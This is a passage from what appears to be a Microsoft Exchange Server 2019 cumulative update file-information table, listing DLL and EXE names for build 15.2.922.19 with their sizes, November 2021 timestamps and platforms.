\nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.922.19| 172,944| 3-Nov-21| 21:16| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.922.19| 102,792| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.922.19| 98,696| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.922.19| 188,792| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.922.19| 43,384| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.922.19| 447,376| 3-Nov-21| 19:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.922.19| 89,976| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.922.19| 107,920| 3-Nov-21| 22:40| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.922.19| 371,080| 3-Nov-21| 21:21| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.922.19| 193,928| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.922.19| 552,312| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.922.19| 16,264| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.922.19| 15,736| 3-Nov-21| 19:39| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.922.19| 321,416| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.922.19| 17,808| 3-Nov-21| 21:04| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.922.19| 45,456| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.922.19| 18,320| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.922.19| 20,880| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.922.19| 415,112| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.922.19| 1,269,624| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.922.19| 41,872| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.922.19| 433,528| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.922.19| 4,566,408| 3-Nov-21| 23:32| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.922.19| 260,984| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.922.19| 33,680| 3-Nov-21| 19:38| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.922.19| 94,096| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.922.19| 586,120| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.922.19| 3,543,440| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.922.19| 67,984| 3-Nov-21| 21:59| x86 \nMicrosoft.exchange.management.dll| 15.2.922.19| #########| 3-Nov-21| 21:36| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.922.19| 58,760| 3-Nov-21| 21:43| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.922.19| 23,952| 3-Nov-21| 21:47| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.922.19| 101,776| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.922.19| 544,120| 3-Nov-21| 21:41| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.922.19| 305,040| 3-Nov-21| 21:46| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.922.19| 273,808| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.922.19| 418,696| 3-Nov-21| 21:44| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.922.19| 275,832| 3-Nov-21| 21:49| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.922.19| 70,528| 3-Nov-21| 21:52| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.922.19| 7,874,448| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.922.19| 1,501,584| 3-Nov-21| 21:46| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.922.19| 71,544| 3-Nov-21| 21:42| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.922.19| 1,301,392| 3-Nov-21| 21:39| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.922.19| 1,876,368| 3-Nov-21| 21:50| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.922.19| 5,366,664| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.922.19| 36,240| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.922.19| 117,624| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.922.19| 209,784| 3-Nov-21| 21:41| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.922.19| 79,760| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.922.19| 17,296| 3-Nov-21| 19:23| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.922.19| 156,024| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.922.19| 65,912| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.922.19| 30,600| 3-Nov-21| 21:04| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.922.19| 58,256| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.922.19| 29,576| 3-Nov-21| 21:26| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.922.19| 175,480| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.922.19| 28,536| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.922.19| 75,144| 3-Nov-21| 21:20| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.922.19| 207,232| 3-Nov-21| 21:22| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.922.19| 440,696| 3-Nov-21| 21:17| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.922.19| 83,336| 3-Nov-21| 21:21| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.922.19| 35,208| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.922.19| 53,112| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.922.19| 96,632| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.migration.dll| 15.2.922.19| 1,110,392| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.922.19| 14,728| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.922.19| 135,552| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.922.19| 5,064,072| 3-Nov-21| 22:34| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.922.19| 19,832| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.922.19| 68,496| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.net.dll| 15.2.922.19| 5,086,096| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.922.19| 265,608| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.922.19| 37,768| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.922.19| 14,224| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.922.19| 549,776| 3-Nov-21| 22:25| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.922.19| 22,920| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.922.19| 106,384| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.922.19| 291,720| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.922.19| 17,272| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.922.19| 277,896| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.odata.dll| 15.2.922.19| 2,993,552| 3-Nov-21| 22:21| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.922.19| 91,520| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.922.19| 101,768| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.922.19| 38,280| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.922.19| 45,456| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.922.19| 58,256| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.922.19| 147,320| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.922.19| 26,504| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.922.19| 184,200| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.922.19| 26,504| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.922.19| 38,280| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.922.19| 55,672| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.922.19| 147,336| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.922.19| 191,880| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.922.19| 33,664| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.922.19| 28,040| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.922.19| 32,656| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.922.19| 15,248| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.922.19| 17,288| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.922.19| 17,288| 3-Nov-21| 19:25| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.922.19| 106,872| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.922.19| 106,872| 3-Nov-21| 21:05| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.922.19| 24,976| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.922.19| 24,976| 3-Nov-21| 21:05| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.922.19| 42,888| 3-Nov-21| 21:04| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.922.19| 264,568| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.922.19| 264,568| 3-Nov-21| 21:05| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.922.19| 358,280| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.922.19| 4,167,032| 3-Nov-21| 21:54| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.922.19| 308,624| 3-Nov-21| 21:55| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.922.19| 41,360| 3-Nov-21| 21:53| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.922.19| 30,600| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.922.19| 137,096| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.922.19| 441,736| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.922.19| 14,216| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.922.19| 224,656| 3-Nov-21| 21:44| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.922.19| 105,864| 3-Nov-21| 21:37| x86 \nMicrosoft.exchange.pst.dll| 15.2.922.19| 168,848| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.922.19| 168,848| 3-Nov-21| 19:22| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.922.19| 259,464| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.922.19| 72,072| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.922.19| 215,928| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.922.19| 106,872| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.922.19| 425,848| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.922.19| 70,536| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.922.19| 46,480| 3-Nov-21| 21:16| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.922.19| 215,952| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.query.core.dll| 15.2.922.19| 168,840| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.922.19| 343,440| 3-Nov-21| 21:16| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.922.19| 174,456| 3-Nov-21| 21:17| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.922.19| 95,096| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.922.19| 127,352| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.922.19| 63,376| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.922.19| 36,752| 3-Nov-21| 21:05| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.922.19| 17,800| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.922.19| 9,666,936| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.922.19| #########| 3-Nov-21| 21:04| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.922.19| 36,752| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.922.19| 97,680| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.922.19| 28,552| 3-Nov-21| 21:05| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.922.19| 72,056| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.922.19| 15,736| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.922.19| 13,200| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.922.19| 59,272| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.rpc.dll| 15.2.922.19| 1,692,040| 3-Nov-21| 21:04| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.922.19| 209,784| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.922.19| 60,304| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.922.19| 518,024| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.922.19| 161,168| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.922.19| 724,368| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.922.19| 243,064| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.922.19| 20,856| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.922.19| 35,192| 3-Nov-21| 21:42| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.922.19| 42,376| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.922.19| 56,208| 3-Nov-21| 21:39| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.922.19| 27,536| 3-Nov-21| 21:04| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.922.19| 130,424| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.922.19| 14,736| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.922.19| 20,360| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.922.19| 21,392| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.922.19| 267,656| 3-Nov-21| 19:28| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.922.19| 110,968| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.922.19| 112,528| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.922.19| 622,472| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.922.19| 185,224| 3-Nov-21| 21:16| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.922.19| 12,176| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.922.19| 19,320| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.search.core.dll| 15.2.922.19| 211,856| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.922.19| 17,800| 3-Nov-21| 21:18| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.922.19| 97,672| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.922.19| 16,776| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.922.19| 436,600| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.search.files.dll| 15.2.922.19| 274,312| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.922.19| 24,976| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.922.19| 218,000| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.search.service.exe| 15.2.922.19| 26,512| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.922.19| 221,048| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.security.dll| 15.2.922.19| 1,559,416| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.922.19| 19,832| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.922.19| 28,560| 3-Nov-21| 19:38| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.922.19| 225,144| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.922.19| 5,151,104| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.922.19| 214,920| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.922.19| 115,600| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.922.19| 82,808| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.922.19| 80,776| 3-Nov-21| 19:23| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.922.19| 66,424| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.922.19| 81,288| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.922.19| 211,848| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.922.19| 1,341,328| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.922.19| 511,880| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.922.19| 47,496| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.922.19| 873,864| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.922.19| 1,352,592| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.922.19| 30,584| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.922.19| 130,440| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.922.19| 1,018,744| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.922.19| 111,504| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.922.19| 34,680| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.922.19| 19,344| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.922.19| 14,728| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.922.19| 60,816| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.922.19| 50,576| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.922.19| 14,200| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.922.19| 14,216| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.services.common.dll| 15.2.922.19| 74,120| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.services.dll| 15.2.922.19| 8,480,656| 3-Nov-21| 22:02| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.922.19| 30,096| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.922.19| 633,736| 3-Nov-21| 22:15| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.922.19| 1,651,080| 3-Nov-21| 22:05| x86 \nMicrosoft.exchange.services.json.dll| 15.2.922.19| 296,328| 3-Nov-21| 22:09| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.922.19| 43,408| 3-Nov-21| 22:03| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.922.19| 233,352| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.922.19| 178,568| 3-Nov-21| 22:12| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.922.19| 348,552| 3-Nov-21| 22:07| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.922.19| 56,712| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.922.19| 93,064| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.922.19| 296,328| 3-Nov-21| 21:59| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.922.19| 35,728| 3-Nov-21| 21:42| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.922.19| 27,024| 3-Nov-21| 22:02| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.922.19| 114,576| 3-Nov-21| 22:02| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.922.19| 53,648| 3-Nov-21| 21:40| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.922.19| 75,144| 3-Nov-21| 19:39| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.922.19| 142,712| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.922.19| 24,952| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.922.19| 15,248| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.922.19| 58,752| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.922.19| 27,016| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.922.19| 46,992| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.sqm.dll| 15.2.922.19| 46,984| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.store.service.exe| 15.2.922.19| 28,048| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.922.19| 26,488| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.922.19| 13,688| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.922.19| 31,632| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.922.19| 1,205,128| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.922.19| 158,584| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.922.19| 628,104| 3-Nov-21| 21:20| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.922.19| 13,200| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.922.19| 16,264| 3-Nov-21| 21:42| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.922.19| 13,192| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.922.19| 221,576| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.922.19| 13,712| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.922.19| 29,048| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.922.19| 138,616| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.922.19| 21,896| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.922.19| 40,328| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.922.19| 22,904| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.922.19| 21,368| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.922.19| 213,392| 3-Nov-21| 21:15| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.922.19| 98,680| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.922.19| 22,920| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.922.19| 169,352| 3-Nov-21| 21:36| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.922.19| 18,320| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.922.19| 20,880| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.922.19| 31,616| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.922.19| 46,968| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.922.19| 30,072| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.922.19| 53,112| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.922.19| 44,936| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.922.19| 18,312| 3-Nov-21| 